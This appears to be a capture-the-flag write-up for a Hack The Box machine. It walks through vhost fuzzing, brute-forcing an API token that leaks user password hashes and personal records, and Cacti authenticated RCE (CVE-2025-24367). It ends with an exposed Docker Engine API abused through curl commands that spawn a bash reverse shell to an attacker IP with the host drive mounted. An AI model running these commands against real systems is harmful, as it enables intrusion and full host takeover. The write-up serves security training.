Port 80 (monitors.htb)
There exist a login page.
Vhost fuzzing
1
| ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://10.129.46.68 -H "Host: FUZZ.monitorsfour.htb" -fs 138
|
Doing a simple Vhost fuzzing using ffuf gives us cacti
cacti.monitorsfour.htb
The version of cacti used here is vulnerable to Authenticated RCE.
I was lost here, so I looked into my burpsuite history and found something interesting.
.env was leaking some sensitive information. But sadly these creds did not work.
Directory Brute forcing
directory brute forcing using ffuf reveals couple of directory.
Among which user looks interesting.
visiting user directory gives us an important error Missing token parameter
Based on the previous error, I passed a parameter token and it gives new error Invalid or missing token.
To check if this parameter is valid, I tried passing different parameter to check the difference in responses.
And this proves, token parameter is valid. Now comes the step to get valid value for this parameter.
Using simple brute force reveals the parameter’s value is 0. And this gives sensitive credentials.
1
| [{"id":2,"username":"admin","email":"[email protected]","password":"56b32eb43e6f15395f6c46c1c9e1cd36","role":"super user","token":"8024b78f83f102da4f","name":"Marcus Higgins","position":"System Administrator","dob":"1978-04-26","start_date":"2021-01-12","salary":"320800.00"},{"id":5,"username":"mwatson","email":"[email protected]","password":"69196959c16b26ef00b77d82cf6eb169","role":"user","token":"0e543210987654321","name":"Michael Watson","position":"Website Administrator","dob":"1985-02-15","start_date":"2021-05-11","salary":"75000.00"},{"id":6,"username":"janderson","email":"[email protected]","password":"2a22dcf99190c322d974c8df5ba3256b","role":"user","token":"0e999999999999999","name":"Jennifer Anderson","position":"Network Engineer","dob":"1990-07-16","start_date":"2021-06-20","salary":"68000.00"},{"id":7,"username":"dthompson","email":"[email protected]","password":"8d4a7e7fd08555133e056d9aacb1e519","role":"user","token":"0e111111111111111","name":"David Thompson","position":"Database Manager","dob":"1982-11-23","start_date":"2022-09-15","salary":"83000.00"}]
|
cracking the hash using crackstation. Only the hash of admin (Marcus) is crackable
And luckily this creds work for monitorsfour.htb
I found nothing interesting here. So, I tried to login to cacti.monitorsfour.htb but creds did not work.
With some tinkering, I found the valid creds for cacti was marcus:wonderful1 . cacti used first name as username.
This webapp is using cacti 1.2.28 which is vulnerable to CVE-2025-24367. Authenticated RCE.
https://www.cve.org/CVERecord?id=CVE-2025-24367
https://medium.com/@929319519qq/cve-2025-24367-exploit-no-code-59aff124d547
Using this GitHub repo, https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC we can get shell as user www-data.
We are now, inside the docker container.
User.txt
Privilege Escalation
This is where I was stuck for a long time. When I moved to monitorsfour.htb, inside changelog there were interesting things.
The most important change log was, migration of Docker Desktop 4.44.2
Simple google search reveals, this version of Docker Desktop was vulnerable.
https://infosecwriteups.com/only-two-lines-of-code-simple-docker-trick-gives-attackers-host-access-a638293f43ad
https://blog.qwertysecurity.com/Articles/blog3
1
2
3
4
5
6
7
8
9
10
| curl -X POST -H "Content-Type: application/json" \
-d '{
"Image":"docker_setup-nginx-php:latest",
"Cmd":["bash","-c","bash -i >& /dev/tcp/10.10.14.52/1338 0>&1"],
"HostConfig":{
"Binds":["/mnt/host/c:/host_root"]
}
}' \
-o create.json \
http://192.168.65.7:2375/containers/create
|
1
2
3
4
5
6
7
| $ cid=$(cut -d'"' -f4 create.json)
$ curl -X POST \
-d '' \
http://192.168.65.7:2375/containers/$cid/start
root@4245532c8949:/var/www/html# cat /host_root/Users/Administrator/Desktop/root.txt
|
The writeup uses wget but the docker container we have do not have wget, so we need to tweak the exploit to use curl.
Root.txt
